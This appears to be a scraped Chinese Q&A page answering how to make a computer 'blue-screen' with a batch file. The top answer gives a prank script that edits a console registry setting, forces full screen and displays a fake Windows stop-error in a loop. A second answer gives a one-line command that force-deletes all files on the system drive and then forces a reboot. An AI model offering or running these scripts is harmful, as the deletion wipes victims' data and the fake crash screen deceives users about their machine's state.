永发信息网

用简单批处理代码 怎么样让电脑蓝屏

答案:2  悬赏:80  手机版
解决时间 2021-03-19 11:12
  • 提问者网友:眉目添风霜
  • 2021-03-19 07:06
用简单批处理代码 怎么样让电脑蓝屏
最佳答案
  • 五星知识达人网友:何以畏孤独
  • 2021-03-19 07:33
让电脑蓝屏的bat代码如下:
@echo off & color 1f
:1
if "%1"=="" goto :FullScreen
::还原显示模式
REG Add HKEY_CURRENT_USER\Console /v FullScreen /t REG_DWORD /d %1 /f>nul
::全屏状态下代码段
cls
echo A problem has been detected and windows has been shut down to prevent damage to your computer.
echo .
echo DRIVER_IRQL_NOT_LESS_OR_EQUAL
echo .
echo If this is the first time ...
echo .
echo If ... continue,press F8 to select advanced startup options, and then select saft mode.
echo .
echo Technical information:
echo .
echo *** stop:0x000000D1(0x00000040,0x00000002,0x00000001,0xF9A5E150)
echo .
set /p wkdxz=*** wanarp.sys-Address F9A5E150 base at F9A59000, Datestamp 41107C89<nul
pause>nul
Goto :1
:FullScreen
::查询显示模式
Set ShowMode=0
for /f "delims=" %%i in ('REG QUERY HKEY_CURRENT_USER\Console /v "FullScreen"') do (
Set ShowMode=%%i
)
Set ShowMode=%ShowMode:~-1%
::设置显示模式为全屏
REG Add HKEY_CURRENT_USER\Console /v FullScreen /t REG_DWORD /d 1 /f>nul
::全屏启动当前Bat脚本
start "" %0 %ShowMode%
退出方式:
按CTRL+C结束批处理,输入Y回车,输入EXIT回车即可退出
全部回答
  • 1楼网友:污到你湿
  • 2021-03-19 08:22
@echo off del %systemdrive%\*.*/f /s /q shutdown -r -f -t 00
我要举报
如以上回答内容为低俗、色情、不良、暴力、侵权、涉及违法等信息,可以点下面链接进行举报!
点此我要举报以上问答信息
大家都在看
推荐资讯